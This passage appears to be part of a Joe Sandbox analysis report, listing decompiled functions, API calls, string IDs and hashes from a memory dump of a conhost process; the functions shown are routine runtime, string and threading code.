                        • Opcode ID: 04110fe1303ae23170d01067f21a2379a8b7f15fb229e823970e9b9ad86e3a7e
                        • Instruction ID: 840abf1d16b60215b648b9c3d80b1b4e18cf891d98f43f7c56298066c681eaac
                        • Opcode Fuzzy Hash: 04110fe1303ae23170d01067f21a2379a8b7f15fb229e823970e9b9ad86e3a7e
                        • Instruction Fuzzy Hash: 6E91D276A0868687EB798A25A4413FE6295FB49B9CF088075CF9A57781DF7CE482D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CEA80 Relevance: 9.0, APIs: 6, Instructions: 35windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CEA80(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x935ceaa0;
				return _t1;
			}




                        0x7ff6935cea8a
                        0x7ff6935cea92
                        0x7ff6935cea9b

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: DebuggerErrorFormatLastMessagePresent
                        • String ID:
                        • API String ID: 2392558662-0
                        • Opcode ID: 4c457b08ee5fe6163a4bbb9ae9242caa92ab86db018097a815e4e33e85b27bec
                        • Instruction ID: 50ad99a3ce92f3c53f5fa62bb0029a2d9e7250ad933e3706a1df56bd2535a6e5
                        • Opcode Fuzzy Hash: 4c457b08ee5fe6163a4bbb9ae9242caa92ab86db018097a815e4e33e85b27bec
                        • Instruction Fuzzy Hash: 72016D31A0CA4285FA718B26BC4B3292768FB88B8AF584078DE5DE7664EE3CD0449700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D6E10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44threadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentThread$printf
                        • String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
                        • API String ID: 2165381015-1971217749
                        • Opcode ID: ac527e257bc644afdc54ffcc70c90d90c99f59a4247c97737c9fd21a4bb84b0f
                        • Instruction ID: 92b7d8343dd1bde7989de99fbbc0c32ee2fdc9eb9c8a1bc333876fa3f3c94f3e
                        • Opcode Fuzzy Hash: ac527e257bc644afdc54ffcc70c90d90c99f59a4247c97737c9fd21a4bb84b0f
                        • Instruction Fuzzy Hash: C001D232608A4586F7318B16E80276A77A8EB88FD8F545075DE1D93390EF3CD485CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D81D0 Relevance: 7.7, APIs: 5, Instructions: 186synchronizationCOMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E00007FF67FF6935D81D0(void* __edx, long long __rax, long long __rcx, void* __r9) {
				long long _v48;
				char _v56;
				void* _t6;
				void* _t9;
				void* _t17;
				long long _t25;

				_t25 = __rax;
				r12d = r8d;
				if (__edx == 1) goto 0x935d8250;
				_v56 = __rcx;
				E00007FF67FF6935D47E0(__rax);
				_v48 = _t25;
				if (_t25 == 0) goto 0x935d82e0;
				r8d = 0;
				r9d = r12d;
				_t6 = E00007FF67FF6935D6920(2, _t25,  &_v56, __r9);
				_t17 = _t6 - 0x80;
				if (_t17 == 0) goto 0x935d8440;
				if (_t17 > 0) goto 0x935d8298;
				if (_t6 == 0) goto 0x935d8280;
				if (_t6 != 1) goto 0x935d8400;
				ResetEvent(??);
				if (__edx != 2) goto 0x935d8489;
				E00007FF67FF6935D4CA0(2, _t25,  &_v56);
				goto 0x935d8205;
				_t9 = E00007FF67FF6935D6880(r8d, _t25, _v48,  &_v56);
				if (_t9 == 0x80) goto 0x935d841d;
				if (_t9 == 0x102) goto 0x935d8418;
				r12d = 0x16;
				if (_t9 != 0) goto 0x935d8283;
				r12d = 0;
				return r12d;
			}









                        0x7ff6935d81d0
                        0x7ff6935d81e0
                        0x7ff6935d81e6
                        0x7ff6935d81e8
                        0x7ff6935d81f2
                        0x7ff6935d81f7
                        0x7ff6935d81ff
                        0x7ff6935d8205
                        0x7ff6935d8208
                        0x7ff6935d8213
                        0x7ff6935d8218
                        0x7ff6935d821d
                        0x7ff6935d8223
                        0x7ff6935d8227
                        0x7ff6935d822c
                        0x7ff6935d8237
                        0x7ff6935d8240
                        0x7ff6935d8246
                        0x7ff6935d824b
                        0x7ff6935d8253
                        0x7ff6935d825d
                        0x7ff6935d8268
                        0x7ff6935d826e
                        0x7ff6935d8276
                        0x7ff6935d8280
                        0x7ff6935d8291

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                        • String ID:
                        • API String ID: 256776027-0
                        • Opcode ID: 6a2e3cb6e530c899bcad0da2263d151bed46981e0c37d3174faaf7f9b013440c
                        • Instruction ID: 5975085b2dc7dfd4486a825992b1a7651c7d5bcb72d8feb4357f132053a83989
                        • Opcode Fuzzy Hash: 6a2e3cb6e530c899bcad0da2263d151bed46981e0c37d3174faaf7f9b013440c
                        • Instruction Fuzzy Hash: F1512B21E1C50341FBB56666A90737E019DFF88798F5840B3DE3EE26D1ED6CED819212
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EDFA0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: basic_string::append
                        • API String ID: 1844840824-3811946249
                        • Opcode ID: a7a3cd996bfde3b224dbfa221b0ab7f1a2ff53d3b97cdf5a41004b6dec482a96
                        • Instruction ID: 4e0649ac8dfda898adab92e3a130fa6edb268c229888b294ce2417eb48e31ef8
                        • Opcode Fuzzy Hash: a7a3cd996bfde3b224dbfa221b0ab7f1a2ff53d3b97cdf5a41004b6dec482a96
                        • Instruction Fuzzy Hash: 7B51AE66A28B45A0EA30DB56C40A4BD6369FB49BC4B958572DE1DE73E0EF3CE585C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EADF0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 158stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: basic_string::append
                        • API String ID: 2619041689-3811946249
                        • Opcode ID: e1d2ad597746bf7c1658432626b76abdacf8226b74ba6b7c3493d97fc326c1ab
                        • Instruction ID: 0cdbbcde0ef34ba1884c0239abf4f39c3a404395a916cafb26ab2e6b508be563
                        • Opcode Fuzzy Hash: e1d2ad597746bf7c1658432626b76abdacf8226b74ba6b7c3493d97fc326c1ab
                        • Instruction Fuzzy Hash: A451F7A7A0878690DE30EB25D45A57D3368FB49BD4F8545B2ED6EA73D2DE2CD441C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EFA80 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935EFA80(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x935efaf0;
				if (_t18 == 1) goto 0x935efae0;
				if (_t18 != 0) goto 0x935efad0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}







                        0x7ff6935efa8a
                        0x7ff6935efa8e
                        0x7ff6935efa99
                        0x7ff6935efa9d
                        0x7ff6935efaa0
                        0x7ff6935efaaa
                        0x7ff6935efab0
                        0x7ff6935efab5
                        0x7ff6935efab9
                        0x7ff6935efabd
                        0x7ff6935efacb

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-126128797
                        • Opcode ID: be1622a82ea9c72d03a65a45040e82aae806f7373a59d638aff1f1c2b3b500d5
                        • Instruction ID: 5091e551dd03ee80b70f9286d316f381720522010f9334d6eaf353fd0ebd5c80
                        • Opcode Fuzzy Hash: be1622a82ea9c72d03a65a45040e82aae806f7373a59d638aff1f1c2b3b500d5
                        • Instruction Fuzzy Hash: 8341D3B3B05B46A4EA309F19D4025BC6369FB1CF98B945672CA1CA73A4EF3CD596D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EF5C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935EF5C0(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x935ef630;
				if (_t18 == 1) goto 0x935ef620;
				if (_t18 != 0) goto 0x935ef610;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}







                        0x7ff6935ef5ca
                        0x7ff6935ef5ce
                        0x7ff6935ef5d9
                        0x7ff6935ef5dd
                        0x7ff6935ef5e0
                        0x7ff6935ef5ea
                        0x7ff6935ef5f0
                        0x7ff6935ef5f5
                        0x7ff6935ef5f9
                        0x7ff6935ef5fd
                        0x7ff6935ef60b

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-126128797
                        • Opcode ID: 63e0ce7270c2b737f1747fb4061735288a54b87dc3d29fbdd0ea6ed819afa5ff
                        • Instruction ID: 47d130116544cccbc99052833b1818d0047563f7db61a5c83e57435ed88af8f3
                        • Opcode Fuzzy Hash: 63e0ce7270c2b737f1747fb4061735288a54b87dc3d29fbdd0ea6ed819afa5ff
                        • Instruction Fuzzy Hash: 7B41F4B3B05B46A5EA309F19D4025BC6369FB1CF94B945672CA1CA73A0EF3CD596D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CFA00 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CFA00(void* __rax, intOrPtr* __rcx, void* __rdx) {
				void* _t4;
				void* _t20;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t24 = __rdx;
				_t20 = __rax;
				_t27 = __rcx;
				if (__rdx == 0) goto 0x935cfa2f;
				E00007FF67FF6935D67C0(_t4, __rdx);
				E00007FF67FF6935D6770(_t20, _t24);
				if (_t20 - _t20 > 0) goto 0x935cfa70;
				_t26 =  *_t27;
				_t1 = _t26 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x935cfa91;
				if (_t26 == 0) goto 0x935cfaa4;
				r13d = 1;
				 *_t26 = r13d;
				if ( *_t26 != 0) goto 0x935cfac8;
				if ( *((intOrPtr*)(_t26 + 4)) != 0) goto 0x935cfab8;
				return 0;
			}







                        0x7ff6935cfa00
                        0x7ff6935cfa00
                        0x7ff6935cfa10
                        0x7ff6935cfa19
                        0x7ff6935cfa1b
                        0x7ff6935cfa25
                        0x7ff6935cfa2d
                        0x7ff6935cfa2f
                        0x7ff6935cfa33
                        0x7ff6935cfa3c
                        0x7ff6935cfa41
                        0x7ff6935cfa43
                        0x7ff6935cfa4c
                        0x7ff6935cfa52
                        0x7ff6935cfa5b
                        0x7ff6935cfa6a

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID:
                        • API String ID: 2086374402-0
                        • Opcode ID: 5cb66feed3387bb1f6bca0632056a1b959e464790da27da300eaa3bad0ac8f63
                        • Instruction ID: 02cf89612e8a31751295cd94586e5cd89397ba5d2e4490753bda729953d6f1c4
                        • Opcode Fuzzy Hash: 5cb66feed3387bb1f6bca0632056a1b959e464790da27da300eaa3bad0ac8f63
                        • Instruction Fuzzy Hash: 3041C532B0865246FF759A25984B63A629DEF08B98F5540B5DD1CE63C0EF7CEC85C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CF8A0 Relevance: 7.6, APIs: 5, Instructions: 102threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CF8A0(intOrPtr* __rcx) {
				intOrPtr* _t16;

				_t16 =  *((intOrPtr*)(__rcx));
				_t1 = _t16 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x935cf900;
				if (_t16 == 0) goto 0x935cf910;
				 *_t16 = 1;
				if ( *_t16 != 0) goto 0x935cf920;
				if ( *((intOrPtr*)(_t16 + 4)) != 0) goto 0x935cf8e0;
				return 0;
			}




                        0x7ff6935cf8a9
                        0x7ff6935cf8ac
                        0x7ff6935cf8b5
                        0x7ff6935cf8ba
                        0x7ff6935cf8c3
                        0x7ff6935cf8c9
                        0x7ff6935cf8d2
                        0x7ff6935cf8df

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: cc74e13d8882e4cdba1e109f71e01e28e67532df65dd771045bf9f1cf09b7f8c
                        • Instruction ID: b010afa58580ee36330ed1ad9ca6cfeabaec06a98148a306b0d5b53d50540bcd
                        • Opcode Fuzzy Hash: cc74e13d8882e4cdba1e109f71e01e28e67532df65dd771045bf9f1cf09b7f8c
                        • Instruction Fuzzy Hash: B631C733F0921282FF768B25A84B76A21A8FF447A9F5544B5DE08E6280EF3CD881C350
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D4690 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E00007FF67FF6935D4690(void* __ecx, void* __rax, long long __rdx) {
				void* _t15;
				void* _t18;
				void* _t20;
				signed long long _t25;

				_t18 = __rax;
				_t15 = __ecx;
				r12d = GetLastError();
				E00007FF67FF6935D2100(__ecx, __rdx);
				_t1 = _t18 + 0x68; // 0x68
				_t20 = _t18;
				E00007FF67FF6935D7BF0(_t1, __rdx);
				if ( *((intOrPtr*)(_t20 + 0x48)) - _t15 <= 0) goto 0x935d4700;
				 *((long long*)( *((intOrPtr*)(_t20 + 0x50)) + _t25 * 8)) = __rdx;
				 *((char*)( *((intOrPtr*)(_t20 + 0x58)) + _t25)) = 1;
				E00007FF67FF6935D7C30(_t1);
				SetLastError(??);
				return 0;
			}







                        0x7ff6935d4690
                        0x7ff6935d46a0
                        0x7ff6935d46ab
                        0x7ff6935d46ae
                        0x7ff6935d46b3
                        0x7ff6935d46b7
                        0x7ff6935d46bd
                        0x7ff6935d46c5
                        0x7ff6935d46cb
                        0x7ff6935d46d6
                        0x7ff6935d46da
                        0x7ff6935d46e2
                        0x7ff6935d46fa

                        APIs
                        • GetLastError.KERNEL32 ref: 00007FF6935D46A5
                          • Part of subcall function 00007FF6935D2100: TlsGetValue.KERNEL32 ref: 00007FF6935D2160
                        • SetLastError.KERNEL32 ref: 00007FF6935D46E2
                        • realloc.MSVCRT(00000000,?,?,00007FF6935C14F6,00007FF6935CF6BB,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D4713
                        • realloc.MSVCRT(00000000,?,?,00007FF6935C14F6,00007FF6935CF6BB,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D4727
                        • memset.MSVCRT ref: 00007FF6935D475D
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: ErrorLastrealloc$Valuememset
                        • String ID:
                        • API String ID: 2591390167-0
                        • Opcode ID: e7d90648816314fb3f1ee89ea78401502af506a05b12dda8d1466fd740f6319f
                        • Instruction ID: 059f6a5f72a9b925640eb93f81ac291b61d7ebbabaa8f4573298dccbbfa7e27f
                        • Opcode Fuzzy Hash: e7d90648816314fb3f1ee89ea78401502af506a05b12dda8d1466fd740f6319f
                        • Instruction Fuzzy Hash: 8A21F426B2570196EB349F2AA80257D2399EF49B94F840076DD1DA7391DE3CD885C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D7C40 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                        • String ID:
                        • API String ID: 2813224205-0
                        • Opcode ID: f7b3bd804d4e3881b65cedab608d9f7cba374d45e9b898210924642bdba9936f
                        • Instruction ID: 1f8d935b011a6f81000c687d6fa05687baff776b787d813393f31b1f9a2d33bc
                        • Opcode Fuzzy Hash: f7b3bd804d4e3881b65cedab608d9f7cba374d45e9b898210924642bdba9936f
                        • Instruction Fuzzy Hash: A001D232B0461692FA668F6B7C832659248FF99773F84457ACD2D96360DD3C98C6C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D9280 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D9280(void* __rcx) {

				if (__rcx != 0) goto 0x935d9298;
				return 0;
			}



                        0x7ff6935d928b
                        0x7ff6935d9294

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Process$CloseCurrentHandleOpen
                        • String ID:
                        • API String ID: 2750122171-0
